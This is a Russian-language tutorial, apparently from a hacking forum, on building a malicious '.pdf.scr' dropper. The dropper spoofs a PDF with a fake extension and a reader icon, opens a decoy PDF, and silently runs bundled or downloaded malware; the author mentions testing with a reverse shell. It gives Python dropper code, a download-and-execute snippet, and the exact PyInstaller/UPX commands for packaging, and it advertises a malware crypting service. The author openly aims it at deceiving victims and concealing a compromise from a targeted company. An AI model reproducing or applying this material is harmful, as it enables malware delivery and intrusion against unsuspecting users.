Malware in .pdf file | Вредоносное ПО в файле .pdf

Спонсор статьи: https://t.me/CryptZoid / Заказывайте крипт/инструменты для самостоятельного криптования файлов в Jesus crypt service

В прошлом мы полагались на эксплойты, нацеленные на конкретные программы чтения PDF-файлов, такие как Adobe Acrobat Reader , например CVE-2009-0658 . Однако эти эксплойты устарели, как и макросы .doc. Совсем недавно мы стали свидетелями появления эксплойта Follina RCE ( CVE-2022-30190 ), который все еще можно использовать, поскольку это относительно новый патч. С другой стороны, другие эксплойты быстро исправляются. В настоящее время сложно атаковать людей с помощью этих устаревших эксплойтов без хорошей уязвимости нулевого дня. Однако есть один аспект, который никогда не устаревает: наш мозг. Да, социальная инженерия по-прежнему остается мощным подходом.

Мы не будем использовать какие-либо эксплойты, а вместо этого создадим простой, но реалистичный pdf.scr.

Приступим

Для начала, что означает «.pdf.scr»? «.scr» — это просто расширение файла, используемое для заставок Windows. Изначально он предназначался для отображения видео и анимации в качестве заставок, но на самом деле может работать с любым исполняемым (exe) файлом. Что касается части «.pdf», то это всего лишь часть имени программы, причем значима только последняя точка. Например, у вас может быть файл с именем «xss.txt.docx.pdf», который явно является файлом PDF. Этот метод известен как подмена расширений. Теперь вы можете задаться вопросом, какова цель всего этого. Ну, по умолчанию Windows скрывает известные расширения файлов, такие как «.exe». Таким образом, вы можете просто назвать файл «xss.pdf.exe», но Windows скроет часть «.exe» и отобразит его как «xss.pdf». Однако, наведя на него указатель мыши, вы поймете, что на самом деле это не PDF-файл (хотя большинство людей не знакомы с форматом файла .scr). Вот в чем проблема: уязвимость человека к социальной инженерии. Чтобы сделать это еще более убедительным, можно было бы использовать значок чтения PDF-файлов, и многие люди (возможно, наивные) дважды щелкали по нему, запуская вредоносное ПО.

Проблема возникает, когда вы не знаете, какую программу чтения PDF-файлов использует цель, что затрудняет использование точного значка. Большинство пользователей Windows 10 склонны использовать программу чтения PDF-файлов Microsoft Edge по умолчанию. Однако для тех, кто использует конкретную программу чтения PDF-файлов и знаком с ее значком, этот подход может столкнуться с трудностями. Теперь давайте представим себе сценарий, в котором вы распространяете такого рода вредоносное ПО среди компании и не хотите, чтобы они поняли, что их взломали (потому что на данный момент PDF-файл, похоже, не открывается, потому что есть только вредоносное ПО). , глупый один подумает, что PDF-файл сломан, другой поймет, что его взломали). Один из вариантов — удалить вредоносное ПО или открыть подлинный PDF-файл. Именно этим мы и займемся в этом уроке: создадим PDF-файл. scr со значком PDF, который фактически открывает настоящий PDF-файл. Итак, создайте свой собственный тестовый PDF-файл и давайте углубимся в него.

Программа Python

Поскольку это руководство ориентировано на новичков и стремится быть несложным и доступным, мы выберем язык программирования Python. Для начала нам потребуется само вредоносное программное обеспечение. Однако для этого урока я не буду писать его с нуля. На этапе тестирования я использовал базовую обратную оболочку C# вместо полной вредоносной программы. Чтобы сделать ситуацию более реалистичной (к сожалению, PDF-файла размером 50 МБ не существует), мы можем создать легкую программу, которая будет загружать вредоносное ПО и открывать PDF-файл.

Питон:

import os

import time

import sys

import subprocess

scriptpath = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__))) # Getting the script dir, because yes during the execution the script is the %temp% directory in a specific folder named "_MEIPASS+randomnumber"

malware = os.path.join(script_dir, 'malware.exe') # Your malware directory from the script dir defined above will show a code if you want to download it from internet, make sure you put the right name

pdf = os.path.join(script_dir, 'xss.pdf') # Same for pdf make sure you put the right name

os.system(pdf) #We open PDF and will crash if there is an error

subprocess.Popen(malware, shell=True) #We exec the malware without stopping the flow of the program

#Imagine being that easy.

Python

import os



import time



import sys



import subprocess



scriptpath  = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__))) # Getting the script dir, because yes during the execution the script is the %temp% directory in a specific folder named "_MEIPASS+randomnumber"



malware = os.path.join(script_dir, 'malware.exe') # Your malware directory from the script dir defined above will show a code if you want to download it from internet, make sure you put the right name



pdf = os.path.join(script_dir, 'xss.pdf') # Same for pdf make sure you put the right name



os.system(pdf) #We open PDF and will crash if there is an error



subprocess.Popen(malware, shell=True) #We exec the malware without stopping the flow of the program



#Imagine being that easy.

Это действительно базовая реализация программы. Если вы хотите загрузить программу, а затем выполнить ее, вы можете просто добавить эти строки перед выполнением. Самый простой способ — использовать urllib :

import urllib.request

malwareurl = "https://github.com/idk/malware.exe"

downloadpath = "Updater.exe"

urllib.request.urlretrieve(malwareurl, downloadpath) # no need comment urllib is simply magic

Python

import urllib.request



malwareurl = "https://github.com/idk/malware.exe"



downloadpath = "Updater.exe"



urllib.request.urlretrieve(malwareurl, downloadpath) # no need comment urllib is simply magic

На данный момент мы успешно разработали наш базовый функциональный код и можем приступить к использованию таких инструментов, как py2exe или pyinstaller . Исходя из моих личных предпочтений, я считаю auto-py-to-exe весьма привлекательным, поскольку он обеспечивает удобный интерфейс для Pyinstaller. Он включает в себя все возможности Pyinstaller, что делает его простым и эффективным выбором. Чтобы установить и запустить auto-py-to-exe, вы можете выполнить следующие действия:

pip install auto-py-to-exe && auto-py-to-exe

Python

pip install auto-py-to-exe && auto-py-to-exe

Поскольку он имеет пользовательский интерфейс, я не буду подробно объяснять, как упаковать его в exe-файл, это действительно просто, вы даже можете установить любые языки (см. следующую часть). «-i» арг). Но самое главное, возможно, --add-data, в дополнительной части -file вы поместите свой вредоносный exe-файл и PDF-файл с точным именем, которое вы установили в файл Python (вы найдете эти файлы непосредственно в «MEIPASS_ " во время выполнения программы).
Вот полученная мной команда Pyinstaller

pyinstaller --noconfirm --onefile --windowed --icon "C:/Users/censored/censored/pdf.ico" --name "xss.pdf" --upx-dir "C:/Users/censored/censored/UPX/ --clean --add-data "C:/Users/censored/Desktop/project/PDF_xss/xss.pdf;." --add-data "C:/Users/censored/Desktop/project/PDF_xss/malware.exe;." "C:/Users/censored/Desktop/project/PDF_xss/script.py"

Python

pyinstaller --noconfirm --onefile --windowed --icon "C:/Users/censored/censored/pdf.ico" --name "xss.pdf" --upx-dir "C:/Users/censored/censored/UPX/ --clean --add-data "C:/Users/censored/Desktop/project/PDF_xss/xss.pdf;." --add-data "C:/Users/censored/Desktop/project/PDF_xss/malware.exe;."  "C:/Users/censored/Desktop/project/PDF_xss/script.py"

Используйте UPX, чтобы уменьшить размер конечного exe-файла. В реальном сценарии я бы создал программу на C#, которая загружает и запускает вредоносное ПО размером менее 10 МБ с помощью + UPX: Pyinstaller дает

/p:EnableCompressionInSingleFile=true /p:PublishTrimmed=true

Python

/p:EnableCompressionInSingleFile=true /p:PublishTrimmed=true

возможность выбрать ico-файл, и нам нужен ЭТОТ ОДИН ЗНАЧОК ЧТЕНИЯ PDF-файлов. Я не нашел «Официальный значок программы чтения PDF-файлов Microsoft Edge», пожалуйста, если найдете, сообщите мне, и я загружу его.
.ico может иметь несколько форм в зависимости от разрешения для лучшей оптимизации, этот делает это идеально.
Вы можете лучше понять это по картинке:


Как вы можете видеть слева, это обычный ico с одним разрешением, второй — официальный, который повышает читаемость даже при небольшом разрешении, увеличивая надпись «PDF».

Теперь вы видите разницу между этими двумя файлами?



Да, ты делаешь это, но твоя жертва нет, хе-хе.

После того, как вы загрузили и добавили этот путь ico в свою команду Pyinstaller, вы просто нажимаете «CONVERT .PY TO .EXE», подождите примерно 2 минуты, откройте папку вывода и переименуйте ее в .scr, и все готово... Заключение Теперь вы можете

Реализовать

Одна поблема: когда мы открываем exe-файл, если программой чтения PDF является Microsoft Edge, мы ясно видим путь к PDF-файлу, своего рода подозрительный путь (папка MEIPASS_), потому что мы замечаем, что это не то место, где мы открыли PDF-файл.

Чтобы избежать этого, идея заключалась бы в том, чтобы скопировать PDF-файл в настоящий каталог exe, заставить exe скрыть себя и, наконец, открыть PDF-файл. Вам нужен код? Ну, я все еще учусь, и у меня этого нет, я буду очень рад, если кто-нибудь из вас найдет время, чтобы научить меня некоторым секретам и продолжать узнавать больше интересных вещей.

В любом случае, у нас есть поддельный PDF-файл (scr-файл), который открывает настоящий PDF-файл, это уже здорово! Есть другой способ, например, файл lnk, идея которого аналогична. Используя этот способ, вы фактически можете подделать любые расширения и открыть настоящий файл, например: .docx, .xls, txt, png и jpg. Дело в том, что в некоторых программах есть значки, которые сильно менялись с течением времени, например Microsoft Word, и помните что вы не знаете, какое программное обеспечение использует вашу цель.

Напомню, что спонсором этой статьи является мой телеграм канал, гже вы можете найти все что вам надо для криптования файлов. https://t.me/CryptZoid